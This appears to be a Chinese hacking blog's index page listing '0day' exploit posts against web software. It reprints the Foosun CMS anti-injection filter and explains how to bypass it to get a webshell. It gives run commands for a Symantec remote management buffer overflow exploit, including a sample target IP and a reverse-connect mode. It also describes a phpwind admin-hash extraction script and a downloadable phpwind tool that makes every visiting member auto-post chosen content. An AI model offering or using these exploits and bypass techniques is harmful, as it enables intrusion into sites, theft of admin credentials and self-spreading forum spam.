0day

ie0day扯淡

ie0day爆了,火了。

无意间发现http://bbs.360safe.com/redirect.php?tid=597258&goto=lastpost,竟然是非专业人士捕获到提交的。

每年年底都有些大东东出来,今年也不例外。

建议大家试试tk的“针对当前这个漏洞的临时解决方案”、MJ的“全球首发补丁”、Killer的巡警和IC的门神

关键词: ie , 0day

风讯cms4sp5 商业版存在严重注射漏洞

风讯4的防注射函数NoSqlHack存在致命缺陷,导致入侵者可以轻松得到webshell

Function.asp

  1. Function NoSqlHack(FS_inputStr)   
  2.     Dim f_NoSqlHack_AllStr,f_NoSqlHack_Str,f_NoSqlHack_i,Str_InputStr   
  3.     Str_InputStr=FS_inputStr   
  4.     f_NoSqlHack_AllStr="*|and |exec |or |insert |select |delete |update |count |master |truncate |declare |and    |exec    |insert    |select    |delete    |update    |count    |master    |truncate    |declare    |char(|mid(|chr(|and[|exec[|insert[|select[|delete[|update[|count[|master[|truncate[|declare[|set[|set |set    |where[|where |where    |xp_cmdshell|xp_cmdshell |xp_cmdshell    "  
  5.     f_NoSqlHack_Str = Split(f_NoSqlHack_AllStr,"|")   
  6.   
  7.   
  8.     For f_NoSqlHack_i=LBound(f_NoSqlHack_Str) To Ubound(f_NoSqlHack_Str)   
  9.     If Instr(LCase(Str_InputStr),f_NoSqlHack_Str(f_NoSqlHack_i))<>0 Then   
  10.     If f_NoSqlHack_Str(f_NoSqlHack_i)="'" Then f_NoSqlHack_Str(f_NoSqlHack_i)=" \' "  
  11.     Response.Write "<html><title>??</title><body bgcolor=""EEEEEE"" leftmargin=""60"" topmargin=""30""><font style=""font-size:16px;font-weight:bolder;color:blue;""><li>???????????</li></font><font style=""font-size:14px;font-weight:bolder;color:red;""><br><li>?????????!</li><br><li>??IP:"&Request.ServerVariables("Remote_Addr")"</li><br><li>????:"&Now"</li></font></body></html><!--Powered by Foosun Inc.,AddTime:"&now"-->"  
  12.     Response.End  
  13.     End if  
  14.     Next   
  15.     NoSqlHack = Replace(Str_InputStr,"'","''")   
  16. End Function    

关键字后面跟空格和tab是过滤的,但是跟回车时一样可以执行注射语句.过滤单引号也没有用的,我插入时用16进制编码,所以每一个点都是有问题的注射点

http://www.sebug.net/vulndb/2306

关键词: 风讯 , 0day , exp , 漏洞 , 入侵

SA-Blog v1.6 wap Exp

sablog是国内安全研究人员写的一款blog程序,但是代码中有一点瑕疵导致可能被获取管理员权限:)

问题出在wap/index.php里的652行左右

» 阅读全文

关键词: 0day , 脚本渗透 , exp , sablog , 漏洞

Symantec remote management stack buffer overflow

Symantec remote management stack buffer overflow exploits for Win32/x86

扫描2967 2976这两个端口

成功率在30%`40%

正向
s -r ip -p 2976

反向
s -r ip -l 你的ip -d 你的端口

PS:
s -r 61.100.149.160

» 阅读全文

关键词: 0day , exp , 漏洞

phpwind 0day Exp

传说中的phpwind 0day?

The exploiet Of The All Phpwind Version
爆admin的密码散列.
速度极慢...要有耐心

请自行修改
$path="/search.php"; 这个不用改
$server='luoq.net'; 改成目标地址
$cookie=' 你抓的cookies!

喜欢的朋友可以做个GUI界面出来!

» 阅读全文

关键词: 0day , phpwind , 安全 , exp , 漏洞

PHPWind论坛无限发帖漏洞工具

软件产生的效果:使用本软件测试存在漏洞phpwind论坛后,当任何注册会员浏览过
测试代码的回帖,将自动发送指定内容的新帖.
论坛根目录地址填写说明:比方说该论坛首页访问地址为
www.****.com/phpwind/index.php
那么填写论坛根目录地址将是去掉文件名后的带/号的地址
www.***.com/phpwind/
传播帖子主题:这个是为我们指定的需要自动发帖的主题
传播帖子内容:这个是为我们指定的需要自动发贴的内容
回贴正文内容:由于必须要把我们生成的代码已回贴的方式贴出,所以这里回帖正文
内容就是我们回帖内容的正文,比方说写一个 顶啊 好啊 都行
Fid值:可以理解PHPWind论坛 的版块的标识代码,如何取得Fid呢 很简单,直接点一下你
想要发帖的版块后,浏览器上的地址里面会有一个为fid=的字符 这个fid=后面数值就
是为该版块fid,需要注意的是自动发贴不能跨版块发送的,你必须在哪个版块发生成
的代码回帖那么这里就要写相应版块的fid值
另外需要注意的是论坛发送回帖后会自动跳转连接到你发回帖的页面 ,而这个时候
相当于你已经自己浏览一次,会自动按你用户名发送自动帖,所以当提交回帖后请在
他自动跳转页面之前按浏览器Stop 然后按浏览器后退 好避免按自己身份发送自动帖

phpwind.zip (332.51 KB, 下载次数:493, 上传时间:2006-09-08 05:51)

关键词: 0day , phpwind , 工具 , 漏洞 , 入侵